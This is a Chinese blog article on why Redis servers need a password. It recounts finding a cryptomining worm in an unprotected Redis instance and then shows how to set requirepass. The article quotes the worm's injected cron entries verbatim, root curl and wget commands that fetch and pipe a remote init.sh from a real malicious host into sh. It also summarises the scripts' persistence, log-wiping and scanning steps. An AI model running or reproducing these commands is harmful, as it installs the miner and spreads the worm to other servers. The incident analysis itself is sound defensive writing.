您好,登錄后才能下訂單哦!
這篇文章主要講解了“Redis一定要設置密碼的原理是什么”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“Redis一定要設置密碼的原理是什么”吧!
內網環境可以不設置密碼,但是個人服務器,以及線上公網服務器就有必要設置密碼了。
昨天我查看了一下minio的redis事件通知,查看redis的key時發現多了幾個奇怪的key。backup1,backup2,backup3。然后我猜想應該是挖礦病毒。
如下面所示:這樣就將定時任務和腳本注入到了我們機器當中,就會開始執行 init.sh 腳本
backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n" backup2 "\n\n\n*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n" backup3 "\n\n\n*/4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n" backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
en2an.top/cleanfda/in…
我們查看這個key的value能得到它會去請求一個地址,我們打開看一下這個init.sh到底是什么東西。
如下圖所示是個腳本文件。
這個腳本還挺多的,關閉selinux、殺掉別人的挖礦進程、殺掉CPU占用過高的進程,如果是自己就跳過、修改破壞系統命令、自己造一個下載器downloads()函數、解鎖和加鎖定時任務、添加挖礦技術任務、設置SSH免密登陸、下載執行礦機挖礦程序、關閉防火墻、清除日志、感染已知的免密機器、下載執行is.sh。
en2an.top/cleanfda/is…
如下圖所示,上面的init.sh會下載我們的is.sh腳本。
我們看一下這個腳本是干什么。
如下圖所示,這個腳本的內容也挺多的。下載masscan掃描器、下載pnscan掃描器、安裝 redis 用于創建 redis 未授權訪問的漏洞、執行 rs.sh。
en2an.top/cleanfda/rs…
上面的連接可以查看這個腳本內容是什么。
開放 6379 端口、自動化利用redis未授權寫入定時任務,利用 pnscan 掃描b段IP 6379 端口,利用 masscan 進行掃描端口。
經過以上分析,就知道這個病毒主要是通過你的redis注入進去執行挖礦腳本。如果你的redis沒有設置密碼,而且暴露在公網上就要小心了。
可以通過以下兩種方式對我們的redis進行設置密碼。
需要注意的是這種方式因為修改了配置文件, 需要重新啟動我們的redis才能生效。
找到我們的redis.conf文件。
Windows如下圖所示
我們編輯此文件,找到requirepass,放開注釋,設置指定的值就,重啟redis就生效了。
Linux的話,因為大家的安裝方式可能不同,我這邊是通過docker安裝的,做了映射的。這里就不給大家演示了,找到自己安裝在linux的redis目錄找到redis.conf配置文件,跟windows一樣的操作,配置完重啟就Ok了。
連接我們的redis,然后通過指令的方式設置密碼。
這種方式比較簡單,而且不需要重啟就生效。
下面的指令的意思就是把密碼設置為123456,公網可不要設置這么簡單阿。
config set requirepass 123456
我們查看一下我們的redis的密碼。
config get requirepass
這樣我們的密碼就設置成功了,退出我們的redis客戶端再次連接的時候就生效了。
感謝各位的閱讀,以上就是“Redis一定要設置密碼的原理是什么”的內容了,經過本文的學習后,相信大家對Redis一定要設置密碼的原理是什么這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是億速云,小編將為大家推送更多相關知識點的文章,歡迎關注!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。